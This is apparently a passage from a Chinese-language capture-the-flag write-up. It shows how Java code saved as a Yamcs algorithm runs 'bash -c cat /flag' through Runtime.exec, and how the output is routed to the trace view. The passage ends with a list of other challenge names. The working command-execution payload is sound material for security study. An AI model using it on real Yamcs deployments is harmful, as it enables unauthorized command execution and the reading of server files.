  • "/usr/bin/env", "bash", "-c", "cat /flag" 是一种安全写法,确保环境变量 PATH 有效;
  • Runtime.getRuntime().exec() 让 JVM 调用系统命令;
  • 通过 process.getInputStream() 把命令执行结果读出来;
  • 把结果写到 out0 变量,这样 Yamcs 的 trace 界面会显示结果;
  • 最后加上 "RETURN_VALUE=" + returnValue 方便调试确认命令是否成功。

Yamcs 的算法执行不是在交互式终端中,而是后台执行。输出不会直接返回到前端页面。因此必须通过:

out0.setStringValue(resultText);

把结果写进算法的输出变量。Yamcs 的 trace 功能会自动记录 out0 的值,于是我们可以在 Web 界面中看到 flag。

解题过程
#

进入myproject下面的Algorithms,来到/myproject/copySunsensor 开启trace

在这执行代码,点击save

try {
    String[] commandArray = {"/usr/bin/env", "bash", "-c", "cat /flag"};

    Process process = Runtime.getRuntime().exec(commandArray);

    java.io.InputStream inputStream = process.getInputStream();
    java.io.ByteArrayOutputStream buffer = new java.io.ByteArrayOutputStream();
    byte[] dataBlock = new byte[4096];
    int bytesRead;
    while ((bytesRead = inputStream.read(dataBlock)) != -1) {
        buffer.write(dataBlock, 0, bytesRead);
    }

    int returnValue = process.waitFor();
    String resultText = buffer.toString(java.nio.charset.StandardCharsets.UTF_8.name());

    out0.setStringValue(resultText + "RETURN_VALUE=" + returnValue);
} catch (java.io.IOException e) {
    out0.setStringValue("IO_ERROR: " + e.toString());
} catch (InterruptedException e) {
    out0.setStringValue("PROCESS_INTERRUPTED: " + e.toString());
}

在trace中看见flag

bbjv

CeleRace

ezphp

SecretVault

yamcs

EzCalc

Proxy

PyBlockly